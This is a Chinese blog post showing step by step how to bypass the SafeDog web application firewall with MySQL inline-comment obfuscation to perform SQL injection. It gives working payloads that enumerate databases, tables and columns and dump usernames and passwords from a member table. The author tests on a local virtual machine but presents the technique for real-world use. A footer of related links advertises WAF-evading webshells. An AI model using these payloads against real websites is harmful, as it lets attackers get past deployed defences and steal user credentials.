php网站安全狗绕过,最新安全狗绕过姿势 - Azeng呐的个人空间 - OSCHINA - 中文开源技术交流社区...
安全狗是让大家最头疼的安全防护软件,然后我给大家带来最新的安全狗绕过,也不知道能活多久。攻防永无止境吧。
最新版本安全狗从官网下载的,我来说一下思路。要想绕过安全狗首先你要知道,安全狗是怎么防护的,过滤的是什么。
来我们先来测试一下,我在虚拟机上面搭建了一个php+mysql的网站。
我们用常规的注入语句看下。
被拦截,先看看他拦截的是什么。只输入and试一下。
只输and没有被拦截,我在后面加了一个1就拦截了,证明他拦截的是数字。我们用注释符号测试一下and /*!1*/=/*!1*/ 和 and /*!1*/=/*!2*/
成功绕过安全狗拦截,我们继续同上拦截数字的原理继续order by /*!18*/查询字段数(因为我知道他原本多少字段)
正常绕过,下面我们来测试/*!union//*!select*//*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/
绕过但是不出数字,我们所以union select没有被执行,安全狗拦截的是select所以注释符号不可以,我们来换个思路把union select取消注释放到post提交下面id=5 and /*!1*/=/*!2*/ union select /*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/
已经爆出数字来,我们来测试查询数据库。(我这事本地Windows这些都清楚,我就不查了,只是思路。)
被拦截了,肯定是database(),被拦截了,把database()用注释符号试一下?and /*!1*/=/*!2*/ union select /*!1*/,/*!database/*a*/()*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/
绕过去了,我们接着试一下查询表名:and /*!1*/=/*!2*/ union select /*!1*/,/*!table_name*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/ from information_schema.tables where table_schema=0x6A69616E limit 0,1
查到第二个数据库的时候就发现了yzsoumember
下面我们查列名:and /*!1*/=/*!2*/ union select /*!1*/,/*!column_name*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/ from information_schema.columns where table_schema=0x6A69616E and table_name=0x797A736F756D656D626572 limit 0,1
查到了username和password下面我们把数据爆出来吧~
and /*!1*/=/*!2*/ /*!union*/ /*!select*/ /*!1*/,/*!username*/,/*!password*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/ from jian.yzsoumember
成功拿到数据,实战因素很多,多多学习经验姿势。
喜欢的大表哥点下关注+再看
php网站安全狗绕过,最新安全狗绕过姿势 - Azeng呐的个人空间 - OSCHINA - 中文开源技术交流社区...相关推荐
- 最新JAVA性能调优实战教程_java性能调优实战 - osc_9z8xc00s的个人空间 - OSCHINA - 中文开源技术交流社区...
在项目压测过程中,发现系统占用,上下文切换非常频繁,在此记录下调优过程,希望对后来人有所帮助. 测试方法:模拟客户端实际操作,向服务器高并发发送数据,查看服务器的负载情况. 服务器基本配置如下 1,基 ...
- 最新html取消dynsrc属性无效,Html属性标签 - osc_5aj0jo70的个人空间 - OSCHINA - 中文开源技术交流社区...
跑马灯 ...普通卷动 ...滑动 ...预设卷动 ...来回卷动 ...向下卷动 ...向上卷动 向右卷动 向左卷动 ...卷动次数 ...设定宽度 ...设定高度 ...设定背景颜色 ...设 ...
- python网站框架下载_web.py首页、文档和下载 - Python框架 - OSCHINA - 中文开源技术交流社区...
web.py是一个小巧灵活的Python框架,它简单而且功能强大. webpy的设计理念力求精简(Keep it simple and powerful),源码很简短,只提供一个框架所必须的东西,不依 ...
- java电子报刊网站_采集电子报纸 - 杨尚川的个人页面 - OSCHINA - 中文开源技术交流社区...
1.接口 /** *报纸采集器 * @author 杨尚川 */ public interface PaperCollector { /** * 下载当日报纸,一个文件对应一个版面 * @return ...
- 绕安全狗mysql_技术讨论 | Fuzz绕过安全狗4.0实现SQL注入
0×00 前言 本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过. 0×01注入绕waf过常用手法使用大小写绕过 使用/**/注释符绕 ...
- SQL注入 安全狗apache3.5.12048版本绕过
微信公众号:乌鸦安全 扫取二维码获取更多信息! 更新时间:2021.04.28 前言 没错,这次我们又来了,还是那条狗,绕过的是安全狗apache3.5.12048版本,个人感觉这个狗比上次的那个有难 ...
- 过新版狗php一句话,整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)...
整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话) 发布时间:2020-06-20 00:54:04 来源:51CTO 阅读:3175 作者:gu ...
- java线程看门狗,ARM之看门狗~! - junjun - JavaEye技术网站 - 小陈的日志 - 网易...
看门狗(watchdog)包括一个4分频的预分频器和一个32位的计数器,时钟通过预分频器输入定时器.定时器递减计数,递减的最小值为0XFF.如果设置一个小于0XFF的值,系统会将0XFF装入计数器,因 ...
- Boston Dynamics实验:机器狗对垒真小狗
当真的小狗遇上机器狗,心里在想什么? Boston Dynamics最新的研究成果机器狗Spot最近走上了街头.不过,好像一不小心惹到了一个小可爱. 这个小可爱叫Alex,它是一条真狗.但它似乎没有把 ...
最新文章
- Linux(Nginx)+Java SpringBoot视频微服务搭建
- 自适应采样非局部神经网络的点云鲁棒操作
- 多线程之旅之四——浅谈内存模型和用户态同步机制
- Android8.1 ifw方案,Android 8.1适配规范及常见问题处理方式
- 7-5 流水作业调度 (10 分)(思路+详解+johnson解析)Come Baby!!!!!!!!!!
- layer中嵌套的页面如何操作父页面_vue中8种组件通信方式,值得收藏
- 表1 中的值 给表2
- 拖拽上传及读取文件实现
- 史上最浅显易懂的Git教程3 分支管理
- POJ2356 Find a multiple 鸽巢原理
- 关于网站注册及修改密码使用阿里云短信服务或云片网短信服务的选择。
- 主流数据库之MySQL函数和MySQL数据操作基础知识及示例
- CSS属性—居中对齐篇
- 联想台式计算机光驱启动,联想台式机怎么样设置光盘启动
- Python告诉你NBA球星都喜欢在哪个位置出手?
- 那些年啊,那些事——一个程序员的奋斗史 ——56
- 李烨_敏捷团队中QA角色的转变
- .net 连接ORACLE中文显示乱码解决方案
- 达立易考教育2023年全真模拟考试盛大开考,是骡子是马溜溜
- Eclipse安装SVN插件和项目迁入迁出SVN